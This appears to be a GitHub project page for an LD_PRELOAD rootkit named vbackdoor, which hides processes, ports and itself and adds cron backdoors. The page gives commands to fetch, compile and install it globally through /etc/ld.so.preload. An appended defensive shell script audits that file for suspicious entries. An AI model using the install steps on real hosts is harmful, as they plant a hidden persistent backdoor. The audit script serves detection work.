Hide a process, port, and itself under Linux using LD_PRELOAD

Overview

vbackdoor


An LD_PRELOAD rootkit that hides a process, a port, and itself under Linux.

Compile the library

git clone https://github.com/veo/vbackdoor.git
cd vbackdoor
vi vbackdoor.c
make
sudo mv vbackdoor.so /usr/local/lib/

or

wget https://raw.githubusercontent.com/veo/vbackdoor/main/vbackdoor.c
vi vbackdoor.c
gcc -Wall -fPIC -shared -o vbackdoor.so vbackdoor.c -ldl
sudo mv vbackdoor.so /usr/local/lib/

Load it with the global dynamic linker

echo /usr/local/lib/vbackdoor.so >> /etc/ld.so.preload

  • Process hiding
  • LD_PRELOAD hiding
  • Network hiding
  • cron Backdoors
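
For defenders, the load step above leaves its trace in /etc/ld.so.preload, a file that rarely has entries on a stock system. The following is an added example, not part of vbackdoor: it lists every entry in that file and flags ones outside the system library directories, missing on disk, or world-writable. The function names, flag labels and the optional root argument are assumptions of this example.

```shell
#!/bin/sh
# Added example, not part of vbackdoor: audit the global preload list.

# Emit one preload entry per line. Comments start at '#'; entries are
# separated by whitespace or colons.
preload_entries() {
    [ -f "$1" ] || return 0
    sed 's/#.*//' "$1" | tr ' \t:' '\n\n\n' | sed '/^$/d'
}

# audit_preload [ROOT]: print "<flags> <entry>" for each preload entry.
# ROOT (assumed: mount point of an offline image) defaults to the live host.
audit_preload() {
    root=${1:-}
    entries=$(preload_entries "$root/etc/ld.so.preload")
    while IFS= read -r entry; do
        [ -n "$entry" ] || continue
        flags=
        case $entry in
            */../*) flags=NONSTANDARD_DIR ;;   # path climbs out of its prefix
            /lib/*|/lib64/*|/usr/lib/*|/usr/lib64/*) ;;
            *) flags=NONSTANDARD_DIR ;;
        esac
        target=$root$entry
        if [ ! -e "$target" ]; then
            # Listed for loading but not visible on disk: dangling or hidden.
            flags="${flags:+$flags,}MISSING_ON_DISK"
        elif [ -n "$(find "$target" -maxdepth 0 ! -type l -perm -0002 2>/dev/null)" ]; then
            # Any local user could replace a library every process loads.
            flags="${flags:+$flags,}WORLD_WRITABLE"
        fi
        printf '%s %s\n' "${flags:-OK}" "$entry"
    done <<EOF
$entries
EOF
}
```

Since the page lists LD_PRELOAD hiding among the features and the library is loaded into every dynamically linked process, tools on an affected live host may not show the file truthfully. Run the audit against a mounted image (`audit_preload /mnt/image`) or from a statically linked shell.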
Owner
veo
Hippies love LSD, VEO love freedom 😈